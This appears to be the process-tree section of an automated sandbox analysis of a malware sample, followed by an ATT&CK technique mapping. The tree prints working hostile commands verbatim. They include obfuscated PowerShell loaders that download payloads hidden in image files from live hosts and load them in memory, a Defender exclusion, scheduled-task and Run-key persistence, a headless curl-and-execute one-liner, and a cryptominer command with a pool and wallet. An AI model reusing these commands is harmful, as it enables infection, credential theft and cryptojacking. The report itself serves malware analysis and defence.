                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                PID:9420
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 9420 -s 924
                                                  10⤵
                                                  • Program crash
                                                  PID:13068
                                              • C:\Windows\SysWOW64\choice.exe
                                                choice /d y /t 5
                                                9⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:4132
                                          • C:\Users\Admin\AppData\Local\Temp\10301650101\50KfF6O.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10301650101\50KfF6O.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • Adds Run key to start application
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:7240
                                            • C:\Windows\system32\attrib.exe
                                              attrib +h +s C:\Users\Admin\AppData\Local\Temp\10301650101\50KfF6O.exe
                                              8⤵
                                              • Views/modifies file attributes
                                              PID:7472
                                            • C:\Windows\system32\attrib.exe
                                              attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                              8⤵
                                              • Views/modifies file attributes
                                              PID:7604
                                          • C:\Users\Admin\AppData\Local\Temp\10301660101\k3t05Da.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10301660101\k3t05Da.exe"
                                            7⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Checks whether UAC is enabled
                                            • Suspicious use of SetThreadContext
                                            • System Location Discovery: System Language Discovery
                                            PID:8272
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\File.bat" "
                                              8⤵
                                              • Drops startup file
                                              • System Location Discovery: System Language Discovery
                                              PID:11816
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cDovLzE5Ni4yNTEuOTEuNDIvdXAvdXBsb2Fkcy9lbmNyeXB0aW9uMDIuanBn'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('httpss.myvnc.com', '1907');"
                                                9⤵
                                                • Blocklisted process makes network request
                                                • Command and Scripting Interpreter: PowerShell
                                                • System Location Discovery: System Language Discovery
                                                PID:4396
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ohbuGGy.exe"
                                              8⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • System Location Discovery: System Language Discovery
                                              PID:11920
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ohbuGGy" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE327.tmp"
                                              8⤵
                                              • System Location Discovery: System Language Discovery
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:11952
                                            • C:\Users\Admin\AppData\Local\Temp\10301660101\k3t05Da.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10301660101\k3t05Da.exe"
                                              8⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              PID:2540
                                          • C:\Users\Admin\AppData\Local\Temp\10301670101\XEh4XP0.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10301670101\XEh4XP0.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:9012
                                          • C:\Users\Admin\AppData\Local\Temp\10301680101\XEh4XP0.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10301680101\XEh4XP0.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            PID:9588
                                          • C:\Users\Admin\AppData\Local\Temp\10301690101\FdqlBTs.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10301690101\FdqlBTs.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • Adds Run key to start application
                                            PID:11924
                                            • C:\Windows\SYSTEM32\cmd.exe
                                              cmd.exe /c 1.bat && 2.js
                                              8⤵
                                              • Checks computer location settings
                                              • Modifies registry class
                                              PID:11948
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic cpu get name
                                                9⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:8716
                                              • C:\Windows\system32\find.exe
                                                find "QEMU"
                                                9⤵
                                                  PID:8724
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@HQ@e@B0@C4@a@Bh@GE@a@Bn@GQ@Yw@v@HM@ZQBn@GE@bQBp@C8@bgBp@C4@bwBj@C4@aQBh@GQ@bgB1@Hk@a@Br@Gk@b@Bh@HY@aQBo@HM@Lw@v@Do@cw@n@Cw@I@@n@D@@Jw@s@C@@JwBT@HQ@YQBy@HQ@dQBw@E4@YQBt@GU@Jw@s@C@@JwBS@GU@ZwBB@HM@bQ@n@Cw@I@@n@D@@Jw@p@Ck@fQB9@@==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($dosigo.replace('@','A')));powershell.exe $OWjuxD"
                                                  9⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  PID:9148
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.haahgdc/segami/ni.oc.iadnuyhkilavihs//:s', '0', 'StartupName', 'RegAsm', '0'))}}"
                                                    10⤵
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious use of SetThreadContext
                                                    PID:9544
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                      11⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:12624
                                                • C:\Windows\System32\WScript.exe
                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2.js"
                                                  9⤵
                                                    PID:12856
                                              • C:\Users\Admin\AppData\Local\Temp\10301700101\659c4db84b.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10301700101\659c4db84b.exe"
                                                7⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:11764
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                  8⤵
                                                    PID:12132
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                    8⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:12144
                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe --algo rx/0 -o 104.245.241.161:49301 -u 49GhWH3rjFtLzNT3yUhfEpYXQHgLTmtauRZJT6wXP37CJXYVkai8Ya1NQdoHtjHAPH59YDnKBLrVRRRjYXw71NRn6Sn97NJ.Worker_CPU -p x --cpu-max-threads-hint=50 -k
                                        2⤵
                                        • Suspicious use of FindShellTrayWindow
                                        PID:9780
                                    • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                      "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                      1⤵
                                        PID:1676
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                        1⤵
                                          PID:3516
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                          1⤵
                                            PID:4028
                                          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                            1⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2172
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBEAEQALQBNAHAAcABSAGUAZgBFAHIARQBuAGMAZQAgAC0AZQBYAEMATAB1AFMAaQBPAE4AUABhAFQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVAB5AHAAZQBJAGQAXABBAHQAdAByAGkAYgB1AHQAZQBzAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXAAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAG8AcgBjAEUAOwAgAEEAZABEAC0AbQBwAFAAUgBlAEYAZQByAEUAbgBDAEUAIAAtAGUAeABDAEwAdQBTAEkATwBOAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABUAHkAcABlAEkAZABcAEEAdAB0AHIAaQBiAHUAdABlAHMALgBlAHgAZQAgAC0AZgBPAHIAYwBlAA==
                                            1⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4012
                                          • C:\Users\Admin\AppData\Roaming\TypeId\Attributes.exe
                                            C:\Users\Admin\AppData\Roaming\TypeId\Attributes.exe
                                            1⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:8672
                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                              2⤵
                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                              • Suspicious use of SetThreadContext
                                              PID:9036
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 9420 -ip 9420
                                            1⤵
                                              PID:5516
                                            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                              C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                              1⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              PID:12796
                                            • C:\Windows\system32\conhost.exe
                                              conhost --headless powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
                                              1⤵
                                              • Process spawned unexpected child process
                                              PID:3540
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
                                                2⤵
                                                • Blocklisted process makes network request
                                                • Command and Scripting Interpreter: PowerShell
                                                PID:4028
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAEQALQBtAFAAUAByAGUARgBlAHIARQBuAGMAZQAgAC0ARQBYAEMATAB1AFMASQBvAG4AcAByAE8AYwBlAFMAcwAgAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAEYATwBSAGMARQA=
                                              1⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              PID:8980

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Reconnaissance

                                            Resource Development

                                            Initial Access

                                            Execution

                                            Command and Scripting Interpreter

                                            2
                                            T1059

                                            JavaScript

                                            1
                                            T1059.007

                                            PowerShell

                                            1
                                            T1059.001

                                            Scheduled Task/Job

                                            1
                                            T1053

                                            Scheduled Task

                                            1
                                            T1053.005

                                            Persistence

                                            Boot or Logon Autostart Execution

                                            1
                                            T1547

                                            Registry Run Keys / Startup Folder

                                            1
                                            T1547.001

                                            Modify Authentication Process

                                            1
                                            T1556

                                            Scheduled Task/Job

                                            1
                                            T1053

                                            Scheduled Task

                                            1
                                            T1053.005

                                            Privilege Escalation

                                            Boot or Logon Autostart Execution

                                            1
                                            T1547

                                            Registry Run Keys / Startup Folder

                                            1
                                            T1547.001

                                            Scheduled Task/Job

                                            1
                                            T1053

                                            Scheduled Task

                                            1
                                            T1053.005

                                            Defense Evasion

                                            Hide Artifacts

                                            1
                                            T1564

                                            Hidden Files and Directories

                                            1
                                            T1564.001

                                            Modify Authentication Process

                                            1
                                            T1556

                                            Modify Registry

                                            1
                                            T1112

                                            Virtualization/Sandbox Evasion

                                            2
                                            T1497

                                            Credential Access

                                            Credentials from Password Stores

                                            1
                                            T1555

                                            Credentials from Web Browsers

                                            1
                                            T1555.003

                                            Modify Authentication Process

                                            1
                                            T1556

                                            Steal Web Session Cookie

                                            1
                                            T1539

                                            Unsecured Credentials

                                            5
                                            T1552

                                            Credentials In Files

                                            5
                                            T1552.001

                                            Discovery

                                            Browser Information Discovery

                                            1
                                            T1217

                                            Process Discovery

                                            1
                                            T1057

                                            Query Registry

                                            8
                                            T1012

                                            System Information Discovery

                                            6
                                            T1082

                                            System Location Discovery

                                            1
                                            T1614

                                            System Language Discovery

                                            1
                                            T1614.001

                                            Virtualization/Sandbox Evasion

                                            2
                                            T1497

                                            Lateral Movement

                                            Collection

                                            Data from Local System

                                            4
                                            T1005

                                            Command and Control

                                            Exfiltration

                                            Impact

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
                                              Filesize

                                              649B

                                              MD5

